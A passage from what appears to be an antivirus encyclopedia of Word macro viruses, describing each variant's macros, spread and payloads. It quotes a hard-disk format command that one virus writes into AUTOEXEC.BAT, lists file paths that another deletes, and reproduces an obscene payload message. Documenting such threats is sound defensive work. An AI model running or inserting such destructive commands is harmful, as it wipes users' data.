by Alien.D to make recognition of an infected file more
difficult (called macro stealth technique).
The main difference between this new variant and the previous
Alien.B virus is that Alien.D contains a one byte corruption in
its AutoOpen macro.
For additional information, please refer to the Alien.A virus
description.
[Word.Alien.E]
Virus name: Word.Alien.E
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 5061 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Alien.E infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened or closed.
The "ToolsCustomize" and "ToolsMacro" options are removed
by Alien.E to make recognition of an infected file more
difficult (called macro stealth technique).
The main difference between this new variant and previous
Alien viruses is that Alien.E contains some modified codes.
For additional information, please refer to the Alien.A virus
description.
[Word.Alien.F]
Virus name: Word.Alien.F
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 8201 Bytes
Place of origin: United States
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Alien.F infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when
they are also opened or closed.
The "ToolsCustomize" and "ToolsMacro" options are removed
by Alien.F to make recognition of an infected file more
difficult (called macro stealth technique).
The main difference between this new variant and previous
Alien viruses is that Alien.F contains a corrupted "FileSaveAs"
macro.
For additional information, please refer to the Alien.A virus
description.
[Word.Anak.A]
Virus name: Word.Anak.A
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: anakAE, AutoOpen,anakAO, anakSA, anakSMU,
(AutoExec, FileSave)
Size of macros: 5578 Bytes in documents
4737 Bytes in global template
Place of origin: Indonesia
Date of origin: March 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Anak infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when
they are saved (FileSave).
Anak removes ToolsMacro, FileTemplates, and ToolsCustomize
to make recognition of an infected document more difficult
(called macro stealth technique).
At the end of each month (starting on the 26th), Anak creates a
new file and inserts the following text into it:
" ...i n t r o d u c i n g...anakSMU Semarang, March 1997 "
Anak also modifies the C:\AUTOEXEC.BAT file to add itself to
the system registry:
" @ECHO OFF "
" REM --------------------------------------------------------- "
" REM anakSMU wont destroy your REGEDIT, Just wanna be there :) "
" REM email: anakSMU@TheOffice.net" "
" REM --------------------------------------------------------- "
The following message is displayed by Anak:
" Yeah!, I wish I were anakSMU. "
[Word.Andry.A]
Virus name: Word.Andry.A
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 6896 Bytes
Place of origin: Indonesia
Date of origin: Spring 1997
Destructive: Yes
Seen In-The-Wild: No
Description:
Andry.A infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
Andry hides FileTemplate, FormatStyle, ToolsCustomize,
ToolsMacro, and ViewToolbars to make recognition of an
infected document more difficult (called macro stealth
technique). We advise not to use those menu items, since
Andry attaches its viral macro to those commands.
On March 1st, Andry encrypts infected documents with the following
password:
" Andry Christian "
If you find a document with an unknown password, please
download a copy of WinWord Password Recovery Tool
(wwprt). It is available at: www.vdsarg.com.
When a document is opened and the second field shows 1 or 3,
Andry replaces all text with the following:
" Hello...Andry Christian WordMacro Virus is Here...."
Also on March 1st, Andry displays the following message and
asks for user input:
" HACKERS Labs '96 - Hackware Technology Research "
" ANDRY [CHRISTIAN] WORD MACRO VIRUS IS HERE !!! "
" DO YOU SUPPORT MY VIRUS ? "
In case of a Yes, nothing happens.
In case of a No, Andry overwrites the AUTOEXEC.BAT file
and tries to format the hard disk.
" @ECHO OFF "
" CLS "
" ECHO Please wait . . . "
" FORMAT C: /U /C /S /AUTOTEST > NUL "
The following comment can also be found in the virus code:
"====================================================================="
" Source Code of Andry Christian WordMacro Virus 0.99 - _eta Release "
"====================================================================="
" Virographer by Andry [Christian] in [Batavia] City, of INDONESIA "
" Viroright (C) 1996-1999 Hackware Technology Research - HACKERS Labs."
" Multi Platform, Multi Infector, Stealth, OneMacro, Encryption, etc "
" Last Update by 01-Maret-1996 & 01:03 PM - Found Bugs...? Call Me "
"====================================================================="
" HACKERS Labs. -> WE ARE A BIG FAMILY OF THE VIRUS CREATOR's TEAM "
"====================================================================="
[Word.Appder.A]
Virus name: Word.Appder.A (a.k.a.FunYour)
Virus Type: Word macro virus
Number of macros: 2 or 3
Encrypted: No
Macro names: Appder, AutoOpen, AutoClose
Size of macros: 1912 Bytes in .doc files
1126 Bytes in global template
Place of origin: Unknown
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
Appder infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed.
Appder adds a "NTTHNTA=xx" value to the [Microsoft Word] section of
winword6.ini and increases the value by one when infecting documents.
Upon reaching a value of 20, Appder triggers its destructive payload
and deletes the following files:
C:\DOC\*.exe
C:\DOC\*.com
C:\WINDOWS\*.exe
C:\WINDOWS\SYSTEM\*.TTF
C:\WINDOWS\SYSTEM\*.FOT
As a result, Windows 3.x does not work properly.
[Word.Appder.B (a.k.a.FunYour)]
Virus name: Word.Appder.B (a.k.a.FunYour)
Virus Type: Word macro virus
Number of macros: 2 or 3
Encrypted: No
Macro names: Appder, AutoOpen, AutoClose
Size of macros: 1528 Bytes in documents
934 Bytes in global template
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: Yes
Description:
The difference between this new variant and the original
Appder.A virus is that the payload has been deleted from the
macro code. Therefore Appder.B does not delete any files.
Appder.B infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
[Word.Appder.C (a.k.a.FunYour)]
Virus name: Word.Appder.C (a.k.a.FunYour)
Virus Type: Word macro virus
Number of macros: 2 or 3
Encrypted: No
Macro names: Appder, AutoOpen, AutoClose
Size of macros: 1912 Bytes in .doc files
1126 Bytes in global template
Place of origin: Unknown
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
The difference between this new variant and the original
Appder.A virus is that Appder.C has a one byte code modification.
Appder.C infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are closed (AutoClose).
Appder.C adds a "NTTHNTA=xx" value to the [Microsoft Word] section
of winword6.ini and increases the value by one when infecting documents.
Upon reaching a value of 20, Appder.C triggers its destructive payload
and deletes the following files:
C:\DOC\*.exe
C:\DOC\*.com
C:\WINDOWS\*.exe
C:\WINDOWS\SYSTEM\*.TTF
C:\WINDOWS\SYSTEM\*.FOT
As a result, Windows 3.x does not work properly.
[Word.Atom.A (a.k.a Atomic)]
Virus name: Word.Atom.A (a.k.a. Atomic)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
Size of macros: 1029 Bytes
Place of origin: Ukraine
Date of origin: February 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
Atom infects the global template (Normal.dot) once an infected
document is opened. Further documents become infected when
a document is opened (FileOpen) or saved (FileSaveAs).
When the "FileSaveAs" macro is called, Atom checks the
system clock for a value of 13 in the seconds field. If this is the
case, Atom adds the password "ATOM#1" to the saved document.
The destructive payload inside "Atom" is activated on the
13th of each month. On this day, Atom deletes all the files
inside the current directory.
[Word.Atom.B]
Virus name: Word.Atom.B
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
Size of macros: 1053 Bytes
Place of origin: Unknown
Date of origin: December 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Atom.A virus is only minor. It does not affect the
functionality of this new variant.
For more information, please refer to the Atom.A virus description.
[Word.Atom.C]
Virus name: Word.Atom.C
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
Size of macros: 1026 Bytes
Place of origin: Unknown
Date of origin: December 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Atom.A virus is only minor. It does not affect the
functionality of this new variant.
For more information, please refer to the Atom.A virus description.
[Word.Atom.D]
Virus name: Word.Atom.D
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
Size of macros: 1024 Bytes
Place of origin: Unknown
Date of origin: December 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Atom.A virus is only minor. It does not affect the
functionality of this new variant.
For more information, please refer to the Atom.A virus description.
[Word.Atom.E]
Virus name: Word.Atom.E
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
Size of macros: 1017 Bytes
Place of origin: Unknown
Date of origin: December 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Atom.A virus is only minor. It does not affect the
functionality of this new variant.
The programming error in Atom.A, which activates the
payload on the 13th of each month, has been fixed in this new
variant. Atom.E activates only on the 13th of December.
For more information, please refer to the Atom.A virus description.
[Word.Atom.F]
Virus name: Word.Atom.F
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
Size of macros: 1022 Bytes
Place of origin: Unknown
Date of origin: December 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Atom.A virus is only minor. It does not affect the
functionality of this new variant.
For more information, please refer to the Atom.A virus description.
[Word.Atom.G:De (a.k.a Atomic)]
Virus name: Word.Atom.G:De (a.k.a. Atomic)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: Atom, AutoOpen, DateiOeffnen, DateiSpeichernUnter
Size of macros: 1120 Bytes
Place of origin: Germany
Date of origin: February 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Atom.G infects the global template (Normal.dot) once an
infected document is opened. Further documents become
infected when a document is opened (DateiOeffnen) or saved
(DateiSpeichernUnter).
When the "DateiSpeichernUnter" macro is called, Atom.G
checks the system clock for a value of 13 in the seconds field.
If this is the case, Atom.G adds the password "ATOM#1" to
the saved document.
The destructive payload inside "Atom" is activated on the
13th of December. On this day, Atom.G deletes all the files
inside the current directory.
Atom.G only works with the German version of Microsoft
Word, since it uses language specific macros.
[Word.Atom.H (a.k.a Adultsex)]
Virus name: Word.Atom.H (a.k.a. Adultsex)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: Atom, AutoOpen, FileOpen, FileSaveAs
Size of macros: 1302 Bytes
Place of origin: Unknown
Date of origin: February 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Atom.A virus is that the payload has been changed in this
new variant.
Instead of deleting files, Atom.H displays the following
message when opening documents:
"KISS ME FUCK ME LOVE ME BITCH SUCK MY DICK ADULT SEX !!
I LOVE SEX DRUGS CLASS A DRUGS YEAH MAN !
I ASK YOU MY DARLING FOR ANAL SEX GIVE IT TO ME !
EVER DANCED WITH THE DEVIL ON THE MOONLIGHT ?
PREY FOR YOUR CUNT YOU SEXY HORNEY BITCH"
The password, which is added to a saved document, was also
changed from "ATOM#1" to "ADULTSEX#1."
For more information, please refer to the Atom.A virus description.
[Word.Attack.A]
Virus name: Word.Attack.A
Virus Type: Word macro virus
Number of macros: 8
Encrypted: Yes
Macro names: AutoOpen, Active, Attack, FileOpen, FileSaveAs,
InActive, Organizer, ToolsMacro
Size of macros: 8201 Bytes
Place of origin: UK
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Attack.A infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened (FileOpen) or saved
(FileSaveAs).
Attack uses ToolsMacro to make recognition of an infected
document more difficult (called macro stealth technique).
Attack has various payloads:
1. It deletes files.
2. It changes file attributes to hidden.
3. It replaces text with the following:
" This is Microsoft Bang!**Virus**--- "
4. It sets the following password to saved documents:
" Virii "
If you find a document with an unknown password, please
download a copy of the WinWord Password Recovery Tool (wwprt).
It is available at: www.vdsarg.com.
[Word.Badboy.A]
Virus name: Word.Badboy.A
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: BadBoy, FileNew, AutoExec, AutoOpen, FileSaveAs
Size of macros: 1873 Bytes
Place of origin: Unknown
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: No
Description:
Badboy infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are saved with the "FileSaveAs" command.
When an infected file is opened on the 1st and 13th of each
month (normal.dot is already infected), Badboy displays the
following message and then sets the " gangsta " password
to the active document:
" Bad Boy BadBoy, What u gonna do "
" What u gonna do when they come for you "
" The Gangsta owns you ! "
" Have a happy new year ! "
Badboy also changes the File Summary info to the following:
" Author = Kenny-G sux "
" Keywords = Gangsta Rappa "
" Comments = The Mutha mix "
To make recognition of an infected file more difficult Badboy
removes the Tools/Macro, Tools/Customize and File/Templates
menus (called macro stealth technique).
[Word.Bandung.A (a.k.a. Jakarta)]
Virus name: Word.Bandung.A (a.k.a. Jakarta)
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs
Toolsmacro, Toolscustomize
Size of macros: 4262 Bytes
Place of origin: Bandung, Indonesia
Date of origin: August/September 1996
Destructive: Yes
Seen In-The-Wild: Yes
Description:
Bandung infects the global template (Normal.dot) when an
infected document is opened. Further documents are infected
with the "FileSave" and "FileSaveAs" commands.
Bandung uses macro stealth techniques to hide itself. It uses
"ToolsMacro" to make recognition of an infected document
more difficult (called macro stealth technique).
The destructive payload activates when Microsoft Word is
started. It checks the date and time and in case of a date later
than the 19th of each month and a time after 11:00 am, Bandung
deletes all files in all directories.
An exception to this are the files located in the following
directories:
C:\WINDOWS
C:\WINWORD
C:\WINWORD6
After the file deletion, Bandung creates the file
C:\PESAN.TXT.
The file contains some Indonesian text telling the user
(translated to English):
" You are unlucky, all files on this machine have been deleted, "
" except for WINDOWS and WINWORD, don't panic, this is "
" not your fault, but this the result of my work......Whoever "
" is able to find a way to combat this virus, I will give the "
" virus listing to you!!!! And of course I will constantly "
" return to greet you with my new viruses .....good luck ! "
" Bandung Monday, June 28 1996, 13:00 pm "
Another payload replaces the letter "a" with "#@." This occurs
when the "ToolsCustomize" macro is called.
Bandung also displays some WordBasic error messages.
[Word.Bandung.B]
Virus name: Word.Bandung.B
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs
Toolsmacro, Toolscustomize
Size of macros: 4262 Bytes
Place of origin: Bandung, Indonesia
Date of origin: August/September 1996
Destructive: No
Seen In-The-Wild: No
Description:
The difference between this new variant and the original
Bandung.A virus is that the AutoExec, ToolsMacro and
ToolsCustomize macros are corrupted.
Due to the corruption, Bandung.B does not activate its
destructive payload. Instead of the payload activation, it
displays various error messages. Bandung.B is still able to
infect the global template and further documents.
Bandung uses "Toolsmacro" to make recognition of an
infected file more difficult (called macro stealth technique).
[Word.Bandung.C]
Virus name: Word.Bandung.C
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
Toolsmacro, Toolscustomize
Size of macros: 5428 Bytes
Place of origin: Bandung, Indonesia
Date of origin: December 1996
Payload: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Bandung.A virus is that the "AutoExec" macro was replaced
with the corrupted "AutoOpen" macro from the Rapi virus.
The payload replaces the letter "a" with "#@." This occurs
when the "ToolsCustomize" macro is called.
Bandung.C uses "ToolsMacro" to make recognition of an
infected document more difficult (called macro stealth
technique).
Due to the new macro code, Bandung.C displays a syntax
error message whenever Microsoft Word is started.
[Word.Bandung.D]
Virus name: Word.Bandung.D
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
Toolsmacro, Toolscustomize
Size of macros: 4262 Bytes
Place of origin: Bandung, Indonesia
Date of origin: December 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Bandung.A virus is that the "AutoExec" macro is corrupted.
Even though there is a corruption in the "AutoExec" macro,
Bandung.D still activates its destructive payload when
Microsoft Word is started.
Another payload replaces the letter "a" with "#@." This occurs
when the "ToolsCustomize" macro is called.
Bandung.D uses macro stealth technique to hide itself. It uses
"ToolsMacro" to make recognition of an infected document
more difficult (called macro stealth technique).
Due to its macro corruption, Bandung.D displays some error
messages.
For more information, please refer to the Bandung.A virus description.
[Word.Bandung.E]
Virus name: Word.Bandung.E
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
Toolsmacro, Toolscustomize
Size of macros: 4262 Bytes
Place of origin: Bandung, Indonesia
Date of origin: January 1997
Payload: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Bandung.A virus is that the "AutoExec" macro is corrupted.
The payload replaces the letter "a" with "#@." This occurs
when the "ToolsCustomize" macro is called.
Bandung.E uses "ToolsMacro" to make recognition of an
infected document more difficult (called macro stealth technique).
Due to its macro corruption, Bandung.E never executes its
destructive payload. Instead it displays the following
Wordbasic error message:
" Out of Memory "
[Word.Bandung.G]
Virus name: Word.Bandung.G
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
ToolsMacro, ToolsCustomize
Size of macros: 1990 Bytes
Place of origin: Bandung, Indonesia
Date of origin: January 1997
Payload: Yes
Seen In-The-Wild: No
Description:
The only difference between this new variant and the original
Bandung.A virus is the "AutoExec" macro.
Bandung.G contains only two lines. One line is empty and one
contains a "DisableAutoMacros" statement.
The payload replaces the letter "a" with "#@." This occurs
when the "ToolsCustomize" macro is called.
Bandung.G does not have the destructive payload from the
original Bandung.A virus.
[Word.Bandung.I]
Virus name: Word.Bandung.I
Virus Type: Word macro virus
Number of macros: 6
Encrypted: No
Macro names: AutoExec, AutoOpen, FileSave, FileSaveAs,
ToolsMacro, ToolsCustomize
Size of macros: 1988 Bytes
Place of origin: Bandung, Indonesia
Date of origin: February 1997
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and the original
Bandung.A virus is the "AutoExec" macro.
Bandung.I contains only three lines from an anti-virus
solution, which disables all the automacros.
Bandung.I does not have the destructive payload from the
original Bandung.A virus.
For more information, please refer to the Bandung.A virus.
[Word.Bertik.A]
Virus name: Word.Bertik.A
Virus Type: Word macro virus
Number of macros: 5
Encrypted: Yes
Macro names: XXXAO, XXXFS, XXXFSA, Payload, AutoOpen
(YYYAO, FileSave, FileSaveAs)
Size of macros: 2988 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: Yes
Description:
Bertik.A infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen) or saved
(FileSave and FileSaveAs).
Bertik is not destructive, it only copies the WINWORD.HLP file
to the templates directory. This happens whenever Bertik infects
a new document. During the process of copying,
WINWORD.HLP is renamed to number.WRD, where "number" increments
with each infection.
Due to the size of WINWORD.HLP, Bertik can fill up the hard drive
space. After a Bertik infection, the templates directory should
be checked for "*.WRD" files.
Bertik also displays the following message when reaching a full
hard drive:
" !!!Made by virus Bertik 1 !!! "
[Word.Birthday.A:De (a.k.a. PCW)]
Virus name: Word.Birthday.A:De (a.k.a. PCW)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen, DateiSpeichernUnter
Size of macros: 1039 Bytes
Place of origin: German computer magazine
Date of origin: July 1996
Destructive: No
Common In-The-Wild: No
Description:
Birthday infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when the "DateiSpeichernUnter" command is used.
It displays the following message:
" Happy Birthday! Herzlichen Glⁿckwunsch... "
[Word.Boom.A:De (a.k.a. Boombastic)]
Virus name: Word.Boom.A:De (a.k.a. Boombastic)
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: AutoExec, AutoOpen, DateiSpeichernUnter,
System
Size of macros: 2863 Bytes
Place of origin: Germany
Date of origin: July 1996
Payload: Yes
Common In-The-Wild: Yes
Description:
Boom is the second macro virus written for the German
version of Microsoft Word.
Boom's destructive payload renames the menu structure of
Word to:
Datei -> Mr.Boombastic
Bearbeiten -> and
Ansicht -> Sir WIXALOT
Einfuegen -> are
Format -> watching
Extras -> you
Tabelle -> !
Fenster -> !
Hilfe -> !
A sound is send to the PC speaker during the renaming
process. After the menu change, Boom will create a new
global template and insert the following text:
" Greetings from Mr. Boombastic and Sir WIXALOT !!! "
" Oskar L., wir kriegen dich!!! "
"Dies ist eine Initiative des Institutes zur Vermeidung und
Verbreitung von "
" Peinlichkeiten, durch in der Oeffentlichkeit stehende Personen,
unter der "
" Schirmherrschaft von Rudi S. ! "
Boom prints this text.
[Word.Box.B]
Virus name: Word.Box.B
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: Box, Dead, AutoOpen, AutoClose, FilePrint,
FilePrintDefault, ToolsMacro
Size of macros: 1988 Bytes
Place of origin: Taiwan
Date of origin: February 1997
Destructive: Yes
Seen In-The-Wild: No
Description:
Box.B infects the global template and further documents when
an infected document is opened (AutoOpen) or closed
(AutoClose).
Box.B uses "ToolsMacro" to make recognition of an infected
file more difficult (called macro stealth technique).
Box.B consists of several destructive payloads. One payload
formats the C:\ drive, another one drops the Dos-based virus
"One Half.3544".
A third payload displays the following messages and adds it to
printed documents:
" Taiwan Super No. 1 Macro Virus "
" Twno1-S "
" Today is my Birthday "
Box.B only works with the Chinese version of Microsoft Word.
[Word.Buero.A (a.k.a Bureau, BuroNeu)]
Virus name: Word.Buero.A (a.k.a Bureau, BuroNeu)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen (DateiSpeichern), BueroNeu
Size of macros: 697 Bytes
Place of origin: Germany
Date of origin: August 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
Buero is another macro virus written for the German version
of Microsoft Word.
Buero infects the global template (Normal.dot) when an
infected document is opened. Further documents become
infected with the "DateiSpeichern" (only in the global template)
command.
After August 15, 1996, Buero renames the system file
"IO.SYS" to "IIO.SYS." This action will leave the computer
unbootable. The second destructive payload searches for
C:\*.DOC files and deletes them.
[Word.Cap.a]
Virus name: Word.Cap.a
Virus Type: Word macro virus
Number of macros: differs
Encrypted: Yes
Macro names: CAP
Size of macros: differs
Place of origin: Unknown
Date of origin: December 1996
Destructive: No
Common In-The-Wild: Yes
Description:
Cap.A is another complex macro virus that is able to spread
on various localized versions of Microsoft Word. While some
macros keep the same name, others are automatically assigned
new names from the localized version of Word.
When Cap.A infects the global template, it deletes all existing
macros. It infects the global template when an infected
document is opened.
Cap.A uses "ToolsMacro" and "FileTemplates" to make
recognition of an infected document more difficult (called
macro stealth technique).
[Word.Cebu.A]
Virus name: Word.Cebu.A
Virus Type: Word macro virus
Number of macros: 4 or more
Encrypted: Yes
Macro names: AutoOpen, AutoClose, AutoExec, MSRun
Size of macros: 1237 Bytes
Place of origin: Hong Kong
Date of origin: Spring 1997
Destructive: Yes
Seen In-The-Wild: No
Description:
Cebu infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen) or closed (AutoClose).
When Cebu triggers (probability of 59/60), it replaces the word
" Asian " with the Word " Cebu ". This happens when Microsoft
Word is started (AutoExec) and sixty-four minutes later
(new probability: 2/15).
Cebu is one of the very few macro viruses that copies user macros,
therefore it can exist with 4 or more macros.
We recommend that you de-install the macro anti-virus solutions
(such as Scanprot) in order to prevent Cebu from snatching
macros.
[Word.Cebu.B]
Virus name: Word.Cebu.B
Virus Type: Word macro virus
Number of macros: 4 or more
Encrypted: Yes
Macro names: AutoOpen, AutoClose, AutoExec, MSRun
Size of macros: 1976 Bytes
Place of origin: Unknown
Date of origin: May 1997
Destructive: Yes
Seen In-The-Wild: No
Description:
Cebu.B infects the global template when an infected document
is opened. Further documents become infected when they are
also opened (AutoOpen) or closed (AutoClose).
The main difference between this new variant and the previous
Cebu.A virus is that Cebu.B has some modified codes and also
contains various bugs.
For more information, please refer to the Cebu.A virus description.
[Word.Chaos.A]
Virus name: Word.Chaos.A
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: FileOpen (TempFileOpen), FileSave (TempFileSave),
AutoExec (TempAutoExec), TempAutoOpen (AutoOpen)
Size of macros: 2810
Place of origin: Unknown
Date of origin: June, 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
Chaos infects the global template when an infected file is
opened. Further documents become infected when they
opened (FileOpen) or saved (FileSave).
Upon starting Word (AutoExec), Chaos puts the following text
string on the status bar: (users will recognize a delay)
" number/500 "
When the random number on the left side reaches 500, Chaos tries
to halt the computer.
[Word.Clock.A:De (a.k.a Extra)]
Virus name: Word.Clock.A:De (a.k.a Extra)
Virus Type: Word macro virus
Number of macros: 11
Encrypted: Yes
Macro names: Action, AutoExec, AutoOpen, Extrasmakro,
DateiSchliessen, Datumunduhrzeit, DateiDokVorlagen,
Dateiallesspeichern, Oeffnen, Speichern
Size of macros: 3795 Bytes
Place of origin: USA
Date of origin: Summer 1996
Payload: Yes
Common In-The-Wild: No
Description:
Clock is another macro virus written for the German version of
Microsoft Word.
It uses "ExtrasMakro" and "DateiDokVorlagen" to make
recognition of an infected document more difficult (called
macro stealth technique).
When an infected document is opened after the 26th of each
month, Clock will display a window containing the time. It will
also activate one of its payloads, which sets the system clock
to a value of 33 in the seconds field. Clock does this every 2 to
3 minutes, which results to a less accurate system clock.
The second payload will start in 1997. Clock will check the
system clock, and in case of a minute value smaller than 5, it
will flip the "FileOpen" and "FileSave" macros.
This will only happen on:
1st of each month
2nd of each month
13th of each month
21st of each month
27th of each month
[Word.Colors.A (a.k.a Rainbow)]
Virus name: Word.Colors.A (a.k.a Rainbow)
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
FileSave, FileSaveAs, macros, ToolsMacro
Size of macros: 6470 Bytes
Place of origin: Portugal
Date of origin: Posted to Usenet in October 1995
Payload: Yes
Common In-The-Wild: Yes
Description:
Colors is the first macro virus that can still infect, even
when all the Auto-macros are turned off. It also uses
"ToolsMacro" to make recognition of an infected file more
difficult (called macro stealth technique).
Upon activation of one of its macros (all except for AutoExec),
Colors tries to infect the global template (normal.dot).
It checks if all its macros are already present in the global
template and if this is not the case, it transfers the virus macros
or replaces already existing ones.
The global template becomes infected when a document is
opened, saved, closed or Microsoft Word is exited. Further
documents become infected when a file is created (FileNew) or
saved (FileSave, FileSaveAs).
The destructive payload is located in the "macros" macro.
Once activated Colors creates a variable in the [Windows]
section of Win.ini with the name "countersu," which counts
upwards from zero. After each 300th call, Colors changes the
color palette of 21 Windows desktop elements.
Background, buttons and borders will have new randomly
selected colors, which will leave the user with a sometimes
unusual looking desktop.
[Word.Colors.B (a.k.a Colo-b)]
Virus name: Word.Colors.B (a.k.a Colo-b)
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
FileSave, FileSaveAs, macros, ToolsMacro
Size of macros: 7006 Bytes
Place of origin: Portugal
Date of origin: April 1996
Payload: Yes
Common In-The-Wild: No
Description:
Colors.B seems to be a variant of the previously found Colors.A
virus. All of the macros seem to be identical to Colors.A,
except for the "AutoOpen" macro, which seems to come from
the Concept virus. It looks like a Colors infected document
was re-infected with Concept, which replaced the "AutoOpen"
macro with its own.
Colors.B is still able to replicate, even though it has new virus
code from a different virus. Colors.B is the first virus that
combines virus codes from 2 different viruses (Colors.A and
Concept.A).
[Word.Colors.C (a.k.a Colo-c)]
Virus name: Word.Colors.C (a.k.a Colo-c)
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
FileSave, FileSaveAs, macros, ToolsMacro
Size of macros: 6493 Bytes
Place of origin: Unknown
Date of origin: July 1996
Payload: Yes
Common In-The-Wild: No
Description:
Colors.C seems to be a corrupted variant of the previously found
Colors.A virus. The submitted virus sample infected the global
template (normal.dot) and new documents, yet the new
infected documents were unable to infect further documents.
Only the first generation was able to infect other files.
Colors.C is therefore very unlikely to survive.
[Word.Colors.D (a.k.a Colo-d)]
Virus name: Word.Colors.D (a.k.a Colo-d)
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
FileSave, FileSaveAs, macros, ToolsMacro
Size of macros: 19688 Bytes
Place of origin: Unknown
Date of origin: August 1996
Payload: Yes
Common In-The-Wild: No
Description:
Colors.D seems to be a combination of the previously found
Colors.A virus and the Microsoft macro virus solution "Scanprot".
Even though Colors.D has an anti-virus solution in its
code, it is still able to spread and infect the global template
(normal.dot) and further documents.
[Word.Colors.E]
Virus name: Word.Colors.E
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
FileSave, FileSaveAs, Macros, ToolsMacro
Size of macros: 6290 Bytes
Place of origin: Unknown
Date of origin: Fall 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and the original
Colors.A virus is that the "AutoOpen" macro has been replaced
with a harmless one. This has no effect on the virus. Colors.E is
still able to activate and infect further documents.
[Word.Colors.F]
Virus name: Word.Colors.F
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: AutoClose, AutoExec, AutoOpen, FileExit, FileNew,
FileSave, FileSaveAs, Macros, ToolsMacro
Size of macros: 6402 Bytes
Place of origin: Unknown
Date of origin: Fall 1996
Destructive: No
Seen In-The-Wild: No
Description:
The only difference between this new variant and the original
